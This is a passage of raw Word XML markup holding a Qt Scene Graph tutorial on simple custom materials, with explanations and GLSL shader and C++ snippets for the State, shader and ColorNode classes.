          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">class has a compare function, we declare that the states </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be compared</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It would have been possible to remove the</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State::compare()</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function and instead declare the shader with</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2152" w:anchor="QSG_DECLARE_SIMPLE_SHADER" w:history="1">
        <w:r w:rsidRPr="00BA5376">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSG_DECLARE_SIMPLE_SHADER</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but this </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could then reduce performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in certain use cases.</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 xml:space="preserve">The state </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>struct is used as a template parameter to automatically generate a</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376" w:rsidRPr="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2153" w:history="1">
        <w:r w:rsidRPr="00BA5376">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterialType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for us, so it is crucial that the pair of shader and state are made up of unique classes. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the same</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376" w:rsidRPr="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376" w:rsidRPr="00BA5376">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class in multiple shaders will will lead to undefined behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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public</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const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char</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vertexShader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const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return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"attribute highp vec4 aVertex;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"attribute highp vec2 aTexCoord;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"uniform highp mat4 qt_Matrix;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"varying highp vec2 texCoord;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"void main() {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    gl_Position = qt_Matrix * aVertex;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    texCoord = aTexCoord;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const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char</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fragmentShader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const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return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"uniform lowp float qt_Opacity;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"uniform lowp vec4 color;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"varying highp vec2 texCoord;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"void main ()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    gl_FragColor = texCoord.y * texCoord.x * color * qt_Opacity;  \n"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"}"</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 xml:space="preserve">Next comes the declaration of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader source code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fragment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5376">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The simple material assumes the presence of</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt_Matrix</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the vertex shader and</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt_Opacity</w:t>
      </w:r>
      <w:r w:rsidR="00BA5376">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the fragment shader.</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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QByteArray</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 xml:space="preserve"> attributes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const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return</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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QByteArray</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&lt;&lt;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"aVertex"</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&lt;&lt;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"aTexCoord"</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We reimplement the</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return the name of the</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24" w:rsidRPr="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aVertex</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24" w:rsidRPr="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24" w:rsidRPr="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aTexCoord</w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These attributes will be mapped to attribute indices 0 and 1 in the node's geometry.</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolveUniforms</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id_color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program</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uniformLocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"color"</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private</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id_color</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A30F24">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uniforms can be accessed either by name or by index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30F24">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index is faster than name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We reimplement the</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resolveUniforms()</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function to find the index of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uniform. We do not have to worry about resolving</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt_Opacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt_Matrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as these are handled by the baseclass.</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> updateState</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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State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state</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const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State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program</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setUniformValue</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id_color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state</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color</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The</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updateState()</w:t>
      </w:r>
      <w:r w:rsidR="00A30F24" w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function is called once for every unique state and we use it to update the shader program with the current color</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The previous state is passed in as a second parameter so that the user can update only that which has changed. In our use case, where all the colors are different, the updateState() function will be called once for every node.</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class</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ColorNode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public</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QSGGeometryNode</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public</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ColorNode</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m_geometry</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QSGGeometry</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defaultAttributes_TexturedPoint2D</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4</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setGeometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
